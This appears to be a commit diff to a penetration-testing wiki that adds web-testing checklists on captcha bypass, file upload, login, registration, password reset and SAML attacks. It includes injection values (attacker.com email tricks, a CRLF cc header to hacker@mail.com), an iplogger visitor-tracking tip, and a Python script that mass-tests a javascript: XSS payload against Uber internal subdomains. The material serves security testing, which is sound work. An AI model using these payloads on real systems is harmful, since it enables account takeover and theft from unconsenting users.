GitBook: [master] 7 pages and 2 assets modified

external-recon-methodology/README.md

@@ -229,7 +229,7 @@ puredns bruteforce all.txt domain.com
 
 Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
 
-### VHosts
+### VHosts / Virtual Hosts
 
 #### IP VHosts
 
@@ -246,6 +246,9 @@ wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-2
 
 #From https://github.com/allyshka/vhostbrute
 vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list"
+
+#https://github.com/codingo/VHostScan
+VHostScan -t example.com
 ```
 
 {% hint style="info" %}

pentesting-web/captcha-bypass.md

@@ -5,9 +5,12 @@
 To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Test these things:
 
 * **Do not send the parameter** related to the captcha.
+  * Change from POST to GET or other HTTP Verbs
+  * Change to JSON or from JSON
 * Send the **captcha parameter empty**.
 * Check if the value of the captcha is **in the source code** of the page.
 * Check if the value is **inside a cookie.**
+* Try to use an **old captcha value**
 * Check if you can use the **same** captcha **value** several times with **the same or different sessionID.**
 * If the captcha consists on a **mathematical operation** try to **automate** the **calculation.**
 * If the captcha consists on **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**

pentesting-web/file-upload/README.md

@@ -129,6 +129,8 @@ Note that **another option** you may be thinking of to bypass this check is to m
 * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
 * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
 * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
+* Upload the ****[**eicar**](https://secure.eicar.org/eicar.com.txt) content to check if the server has any **antivirus**
+* Check if there is any **size limit** uploading files
 
 Here’s a top 10 list of things that you can achieve by uploading \(from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)\):
 
@@ -143,6 +145,10 @@ Here’s a top 10 list of things that you can achieve by uploading \(from [link]
 9. **ZIP**: RCE via LFI / DoS
 10. **PDF / PPTX**: SSRF / BLIND XXE
 
+### Burp Extension
+
+{% embed url="https://github.com/portswigger/upload-scanner" %}
+
 ## Magic Header Bytes
 
 * **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`

pentesting-web/login-bypass/README.md

@@ -66,3 +66,16 @@ pwd))
 admin))(|(|
 ```
 
+### Remember Me
+
+If the page has "**Remember Me**" functionality check how is it implemented and see if you can abuse it to **takeover other accounts**.
+
+### Redirects
+
+Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect**](../open-redirect.md). Maybe you can steal some information \(codes, cookies...\) if you redirect the user to your web.
+
+## Other Checks
+
+* Check if you can **enumerate usernames** abusing the login functionality.
+* Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `<input autocomplete="false"`
+

pentesting-web/registration-vulnerabilities.md

@@ -11,7 +11,8 @@
   * add some some in the email
   * special characters in the email name \(%00, %09, %20\)
   * Put black characters after the email: `test@test.com                    a`
-  * 
+  * victim@gmail.com@attacker.com
+  * victim@attacker.com@gmail.com
 
 ### Username Enumeration
 
@@ -30,13 +31,18 @@ In that case you may try to bruteforce credentials.
 
 {% page-ref page="oauth-to-account-takeover.md" %}
 
-### Redirects
+### SAML Vulnerabilities
 
-Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect**](open-redirect.md).
+{% page-ref page="saml-attacks/" %}
+
+### Change Email
+
+when registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.
 
 ## More Checks
 
 * Check if you can use **disposable emails**
 * **Long** **password** \(>200\) leads to **DoS**
 * **Check rate limits on account creation**
+* Use username@**burp\_collab**.net and analyze the **callback**
 

pentesting-web/reset-password.md

@@ -162,8 +162,6 @@ POST /api/changepass
 
 ### No Rate Limiting: Email Bombing <a id="5-no-rate-limiting-email-bombing"></a>
 
-![](https://www.howtogeek.com/thumbcache/2/200/5b21f5dc5ea2ab9cc8ec78b8cc2e437e/wp-content/uploads/2019/04/email-bomb.jpg)
-
 ### Exploitation
 
 * Start the Burp Suite and Intercept the password reset request
@@ -246,3 +244,20 @@ email=victim@email.com&code=$YOUR_TOKEN$
 
 * https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
 
+## Session I**nvalidation** in Logout/Password Reset
+
+When a user **logs out or reset his password**, the current session should be invalidated.  
+Therefore, **grab the cookies** while the user is logged in, **log out**, and **check** if the **cookies** are still **valid**.  
+Repeat the process **changing the password** instead of logging out.
+
+## Reset Token expiration Time
+
+The **reset tokens must have an expiration time**, after it the token shouldn't be valid to change the password of a user.
+
+## Extra Checks
+
+* Use username@burp\_collab.net and analyze the callback
+* User carbon copy email=victim@mail.com%0a%0dcc:hacker@mail.com
+* Long password \(&gt;200\) leads to DoS
+* Append second email param and value
+

pentesting-web/saml-attacks/README.md

@@ -4,6 +4,14 @@
 
 {% page-ref page="saml-basics.md" %}
 
+## Attacks Graphic
+
+![](../../.gitbook/assets/image%20%28554%29.png)
+
+## Tool
+
+\*\*\*\*[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): A tool that can take a URL or list of URL and prints back SAML consume URL.
+
 ## XML Signature Wrapping Attacks
 
 XML documents containing XML Signatures are typically **processed in two independent steps**: **signature** **validation** and **function** **invocation** \(business logic\). If both modules have different views on the data, a new class of vulnerabilities named XML Signature Wrapping attacks \(XSW\) exists.  
@@ -189,6 +197,48 @@ SAML Token Recipient Confusion \(SAML-TRC\) has a few prequisite conditions in o
 
 The attack is relatively simple if the conditions are true. We **authenticate** to **SP-Legit** via the shared Identity Provider. We then **intercept the SAML Response on its way from the IdP to SP-Legit**. Once intercepted, we send the **SAML Response that was intended for SP-Legit to SP-Target instead.** If **SP-Target accepts the Assertion**; we’ll find ourselves logged in with the same account name as we have for SP-Legit and get access to SP-Target’s corresponding resources.
 
+## XSS in Logout functionality
+
+\(Access the [original research here](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)\)
+
+After performing the directory brute forcing I found the following page:
+
+```text
+https://carbon-prototype.uberinternal.com:443/oidauth/logout
+```
+
+It's a logout page, I opened the above link and it did redirect me to the following page
+
+```text
+https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
+```
+
+The base parameter is taking a URL so how about replacing that with the old classic `javascript:alert(123);` to trigger an XSS.
+
+### Mass Exploitation
+
+Using [**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) that can take a list of URLs and then give you back the callback \(SAML consume\) URL, I decided to feed the tool with all subdomains of `uberinternal.com` to see if there are other domains that use the same library and there was.
+
+What I did next was to create a script that calls the vulnerable page `oidauth/prompt` and try the XSS and if my input is reflected it gives me a nice vulnerable message.
+
+```python
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+from colorama import init ,Fore, Back, Style
+init()
+
+with open("/home/fady/uberSAMLOIDAUTH") as urlList:
+            for url in urlList:
+                url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
+                request = requests.get(url2, allow_redirects=True,verify=False)
+                doesit = Fore.RED + "no"
+                if ("Fady" in request.content):
+                    doesit = Fore.GREEN + "yes"
+                print(Fore.WHITE + url2)
+                print(Fore.WHITE + "Len : " + str(len(request.content)) + "   Vulnerable : " + doesit)
+```
+
 ## References
 
 The attacks were obtained from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)